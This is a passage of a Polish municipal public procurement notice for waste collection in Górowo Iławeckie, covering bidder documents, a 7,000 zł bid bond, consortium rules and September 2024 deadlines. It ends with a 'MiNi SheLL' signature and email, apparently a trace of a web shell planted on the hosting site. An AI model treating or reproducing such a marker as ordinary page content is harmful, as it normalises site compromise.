upływem terminu składania ofert lub innego<br/>dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz<br/>z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na<br/>raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.<br/>4) Oświadczenie Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o<br/>zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo- w przypadku wydania takiego<br/>wyroku lub decyzji- dokumenty potwierdzające dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami<br/>lub zawarcie wiążącego porozumienia w sprawie spłat tych należności- stanowiące załącznik nr 8 do SWZ.<br/>5) Oświadczenie Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienie<br/>publiczne- stanowiące załącznik nr 8 do SWZ.<br/>6) Oświadczenie Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia<br/>1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2023 r. poz. 70 ze zm.)- stanowiące załącznik nr 8 do SWZ.<br/>7) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, wraz ze złożeniem oświadczenia,<br/>wykonawca może przedstawić dowody, że powiązania z innym wykonawca nie prowadzą do zakłócenia konkurencji w postepowaniu<br/>o udzielenie zamówienia wg. załącznika nr 3 SWZ.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców<br/>oświadczenie składa każdy z wykonawców wspólnie ubiegający się o zmówienie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień<br/>złożenia, następujących przedmiotowych środków dowodowych:<br/>1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu:<br/>a) aktualne zezwolenie na zbieranie odpadów komunalnych oraz odpadów komunalnych niebezpiecznych wydane przez<br/>organ właściwy ze względu na miejsce zbierania odpadów, opisane w art. 41ust. 1 lub art. 232 ust. 1 Ustawy z dnia 14<br/>grudnia 2012 r. o odpadach (tj. Dz. U. z 2023 r. poz. 1587<br/>ze zm.),<br/>b) wpis do rejestru, o którym mowa w art. 49 ust. 7 ust. 1 Ustawy z 14.12.2012 o odpadach (Dz.U.<br/>z 2023 r., poz. 1587 z póz. zm.), w zakresie określonym w art. 50 ust. 1 pkt 5 ppkt b;<br/>c) wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny o którym mowa<br/>w art. 49 ust. 1 Ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U z 2023 r. poz.1587 ze zm.), prowadzonego przez<br/>Marszałka Województwa lub przez Głównego Inspektora Ochrony Środowiska,<br/>do czasu utworzenia ww. rejestru przez Marszałka Województwa, zgodnie z art. 235 ust. 2 tej ustawy.<br/>d) posiada wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych<br/>od właścicieli nieruchomości zamieszkałych na terenie Gminy Miejskiej Górowo Iławeckie, prowadzonego przez Burmistrza<br/>Górowo Iławeckie na podstawie art. 9b i art. 9c Ustawy z dnia<br/>13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tj. Dz.U. z 2023 r. poz. 1469 ze zm.).<br/>e) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie<br/>ostatnich 3 lat przed upływem terminu składania ofert albo wniosków<br/>o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane sporządzony wg<br/>załącznika nr 5 do SWZ, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz<br/>którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli<br/>z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem<br/>terminu składania ofert albo wniosków<br/>o dopuszczenie do udziału w postępowaniu;<br/>f) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.<br/>W wykazie narzędzi należy wykazać wymagane samochody, o których mowa w Rozdziale nr 5 ust. 2 pkt 4. Powyższy<br/>wykaz narzędzi sporządzony wg załącznika nr 6 do SWZ;<br/>g) oświadczenie Wykonawcy o posiadaniu bazy magazynowo- transportowej spełniającej wymagania Rozporządzenia<br/>Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań<br/>w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r. poz. 122 ze zm.) wraz z<br/>informacją o podstawie dysponowania tym zasobem sporządzone wg. załącznika nr 7<br/>do SWZ.<br/>h) Dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez<br/>Zamawiającego, tj. opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości: 7 000 zł (słownie: siedem<br/>tysięcy złotych).<br/>2. Wadium musi być wniesione przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach, zgodnie z art. 97 ustawy Pzp tj.<br/>a) pieniądzu; przelewem na rachunek bankowy Zamawiającego 26 8855 0004 2003 0011 0815 0001: Bank Spółdzielczy<br/>Bartoszyce/oddział Górowo Iławeckie ( w tytule przelewu należy wpisać nazwę postępowania i swój NIP),<br/>b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej, w tym że poręczenie kasy<br/>jest zawsze poręczeniem pieniężnym,<br/>c) gwarancjach bankowych;<br/>d) gwarancjach ubezpieczeniowych;<br/>e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia<br/>9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>1) Wadium wnoszone w innej dopuszczalnej formie niż w pieniądzu należy złożyć w oryginale w ofercie lub poza ofertą w<br/>terminie przewidzianym na składanie ofert.<br/>2) W ofercie należy wpisać nr konta, na które Zamawiający będzie mógł zwrócić wadium wniesione<br/>w pieniądzu. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia publicznego albo reprezentowania ich w postępowaniu o udzielenie zamówienia. Pełnomocnictwo<br/>winno być załączone do oferty w postaci elektronicznej.<br/>2. Składając ofertę wspólnie przez dwóch lub więcej Wykonawców należy zwrócić uwagę<br/>w szczególności na następujące wymagania:<br/>a) następujące dokumenty i oświadczenia: formularz oferty oraz oświadczenie o spełnianiu warunków udziału w<br/>postępowaniu podpisują wszyscy członkowie konsorcjum lub Pełnomocnik w imieniu całego konsorcjum;<br/>b) następujące dokumenty i oświadczenia: aktualną informację z Krajowego Rejestru Karnego, odpis<br/>z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, zaświadczenie naczelnika Urzędu<br/>Skarbowego, zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia<br/>Społecznego, Oświadczenie Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji<br/>administracyjnej o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo- w<br/>przypadku wydania takiego wyroku lub decyzji, Oświadczenie Wykonawcy o braku orzeczenia wobec niego tytułem środka<br/>zapobiegawczego zakazu ubiegania się o zamówienie publiczne, Oświadczenie Wykonawcy<br/>o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i<br/>opłatach lokalnych oświadczenie o braku podstaw do wykluczenia z postępowania, listę podmiotów należących do tej samej<br/>grupy kapitałowej, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej, zaświadczenie o wpisie do<br/>rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu miasta<br/>Górowo Iławeckie, składa każdy z członków konsorcjum w imieniu własnym;<br/>c) następujące dokumenty i oświadczenia: wykaz wykonanych usług, wykaz narzędzi, wyposażenia<br/>i urządzeń technicznych dostępnych Wykonawcy, niezbędnych do realizacji zamówienia, składa co najmniej jeden z<br/>członków konsorcjum, dysponujący danymi zasobami (zasoby te uzupełniają się). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) Niezwłocznie po wyborze najkorzystniejszej oferty zamawiający zawiadamia wykonawców, którzy złożyli oferty o wyborze<br/>najkorzystniejszej oferty, podając nazwę, siedzibę i adres wykonawcy, którego ofertę wybrano wraz z uzasadnieniem jej<br/>wyboru, a także nazwy, siedziby i adresy wykonawców, którzy złożyli oferty, a także punktację przyznaną ofertom w każdym<br/>kryterium oceny ofert i łączną punktację. Zamawiający zawiadamia również o wykonawcach, których oferty zostały<br/>odrzucone lub wykonawcach, którzy zostali wykluczeni z postępowania o udzielenie zamówienia podając uzasadnienie<br/>faktyczne<br/>i prawne.<br/>2) Wszelkie zobowiązania wynikające z realizacji przedmiotu zamówienia, a spoczywające<br/>na Wykonawcy oraz Zamawiającym zawiera wzór umowy - załącznik nr 9 do SWZ.<br/>3) Wykonawca składa oświadczenie, że wzór umowy został przez niego zaakceptowany i zobowiązuje się, w przypadku<br/>wyboru jego oferty, do zawarcia umowy na określonych w niej warunkach, w miejscu i terminie wskazanym przez<br/>Zamawiającego. Parafowany wzór umowy należy załączyć do Oferty przetargowej jako akceptacja treści i warunków.<br/>4) Wykonawca przed zawarciem umowy poda wszystkie niezbędne dane do wypełnienia treści umowy na wezwanie<br/>zamawiającego.<br/>5) Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie<br/>żądał przez zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców,<br/>w której m.in. zostanie określony pełnomocnik uprawniony do kontaktów z zamawiającym oraz do wystawiania dokumentów<br/>związanych z płatnościami, przy czym termin, na jaki została zawarta umowa, nie może być krótszy niż termin realizacji zamówienia. Niedopełnienie powyższych formalności przez wybranego wykonawcę będzie potraktowane przez<br/>zamawiającego jako niemożność zawarcia umowy w sprawie zamówienia publicznego z przyczyn leżących po stronie<br/>wykonawcy i zgodnie z art. 98 ust. 6 pkt 3 ustawy Pzp, będzie skutkowało zatrzymaniem przez zamawiającego wadium<br/>wraz z odsetkami.<br/>6) Zamawiający nie przewiduje zawarcia umowy ramowej, o której mowa w art. 311-315 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Urząd Miasta Górowo Iławeckie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-24 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com